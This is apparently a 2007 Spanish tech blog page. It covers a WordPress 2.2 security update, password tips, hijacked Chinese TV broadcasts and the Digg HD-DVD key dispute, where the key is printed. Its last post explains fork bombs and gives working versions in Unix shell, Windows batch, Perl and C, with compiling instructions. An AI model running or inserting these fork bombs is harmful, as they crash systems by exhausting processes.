gEEK tHE pLANET

Gracias a DragoN me he enterado de esta importante actualización para wordpress, para nadie es extraño que esta última versión ha salido muy defectuosa, en un principio se vio el problema con los widgets, luego en buyacorp nos muestran una vulnerabilidad del tipo SQL Injection (con exploit incluido en C#).

En Alex Seo han hecho una recopilación con todos los archivos que se han actualizado para estar versión 2.2.

Descargar actualizaciones: Archivos Actualizados Wordpress 2.2

La actualización es altamente recomendable ya que la próxima versión de actualización WP 2.2.1 apenas saldrá el 16 de Junio.

La seguridad comienza por casa, lo que quiere decir que pues si no tenemos nociones básicas sobre seguridad en la red lo mínimo que podemos hacer es tener una buena contraseña, en 20 minutos han publicado un interesante artículo para crear la mejor contraseña y asi poder evitar intrusos.

• Fuera del diccionario: La mayoría de programas para crackear contraseñas utilizan los diccionarios, por lo que, aunque el termino sea raro ó en otro idioma, es mejor que no este en el diccionario. Igualmente, evita combinaciones que empiecen por las primeras letras (a, b, c…).
• Datos desconocidos: Es posible que la persona que quiere entrar en nuestros archivos nos conozca, por lo que el nombre de la novia o padre es una mala opción.
• Pregunta relacionada: Es mejor no usar esta opción. Especialmente, si tienes una pregunta muy fácil (¿cuál es mi libro preferido? ¿Cómo se llama mi mascota?).
• Tamaño: Una buena contraseña debe tener al menos seis caracteres. Lo ideal es usar el número máximo de caracteres que se nos permita en cada caso.
• Complejidad: Lo mismo puede decirse de su grado de dificultad. Muchos ataques sólo combinan letras y números y no son eficaces contra combinaciones raras de signos. Es muy eficaz utilizar @, $, &, #, !, etc., en medio de nuestra contraseña.

Cómo crear una contraseña super segura
Elige una frase que te guste (UN TRISTE TIGRE, por ejemplo); elimina los espacios (UNTRISTETIGRE); sustituye letras por números o signos que recuerdes, por ejemplo: la E por un 3, la I por un 1, la T por # (UN#R1S#3#1GR3). Usa los primeros ocho o diez caracteres –todos los que puedas– y tendrás una contraseña excelente y muy segura. No olvides cambiarla con regularidad.

Y como ejemplo de lo que NO se debe hacer, les dejo el top 1o de la Imprudencia, las 10 contraseñas más usadas (también publicado en 20 minutos):

1. password
2. 123456
3. qwerty
4. abc123
5. letmein
6. monkey
7. myspace1
8. password1
9. blink182
10. (tu nombre)

Leer Más: La mejor contraseña para evitar intrusos
Las diez contraseñas más usadas en la Red

Al mejor estilo de la pelí­cula hackers, las señales por satélite de la televisión china han sido supuestamente saboteadas para la difusión de mensajes en contra del gobierno. Según el periódico de Shangai XinMin Evening News, que cita informaciones de la web Sohu.com, el pasado martes por la noche los espectadores de la provincia de Guangdong pudieron contemplar en sus pantallas durante unas dos horas mensajes contra el gobierno chino que duraban entre 30 y 40 segundos.

Leer Más: Hackers chinos en la televisión

Meses después de que el algoritmo de encriptación del formato del HD-DVD fuese crackeado, en forma del siguiente número: 09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63-56-88-c0 (09-f9-11-02-9d-74-e3-5b-d8-41-56-c5-63), cientos de historias han comenzado a desaparecer de la portada de Digg.

El sistema democrático por excelencia ha caí­do y se ha vendido ante una de las causas que están en contra de la idea fundamental de Digg que es la libertad.

Varios miembros han comenzado a ser banneados junto con las historias, la comunidad está enardecida y luchando contra el sistema que hasta el dí­a de hoy defendieron, se han comenzado a enviar diferentes historias con la misma esencia de difundir tal número; desde canciones, acertijos, protectores de pantalla, camisetas, un sitio web, hasta la ingeniosa conversión del número hexadecimal a decimal y posterior liberación de dicho número bajo una licencia libre. Todo en menos de medio dí­a.

El blog oficial de Digg ya dió su explicación, argumentando que ésta clave de encriptación atenta contra la propiedad intelectual.

Lo que no sabí­an es que un número no tiene patente ni forma de comprobar que “es mí­o” o de alguien más.

¿El trasfondo del asunto? Digg se vendió, cierta empresa que tiene mucho que ver con el HD-DVD ha comprado publicidad en el sitio y atenta contra sus intereses. Es decir, no es la piraterí­a, pues al mes hay decenas de historias de torrents, de the Pirate Bay, de aXXo y otras que latentemente dañan la propiedad intelectual, tan sencillamente como que se vendieron.

Leer Más: Digg.com Attempts To Suppress HD-DVD Revolt
Censoring a Number

No me podia quedar con la intriga y seguí­ investigando sobre el DoS en Unix, encontré que esa lí­nea de código es una Bomba Fork, que no es más que una de las formas de ataque DoS contra un sistema informático, este ataque produce una operación de bifurcación mediante la cual por un proceso se crea otro proceso y asi sucesivamente hasta que se produce una Denegacion de Servicio. Creo que esta imagen habla por si sola:

Si quieren leer más puede hacerlo en wikipedia, tiene una muy buena explicación de lo que es una Bomba Fork, eso si, en inglés. Ejemplos de Bombas Fork:

en Unix

:(){ :|:& };:

en windows usando un archivo batch

:s
start %0
goto s

usando perl
(forking using the Perl interpreter):

perl -e "fork while fork" &

en C

#include <*unistd.h*>
int main()
{
while(0==0)
fork();
}

La cabecera unistd.h es sin los asteriscos, pero por razones de problemas con códigos en el WP se los puse, si lo quiere compilar, quitenle los asteriscos.

[Leer mas]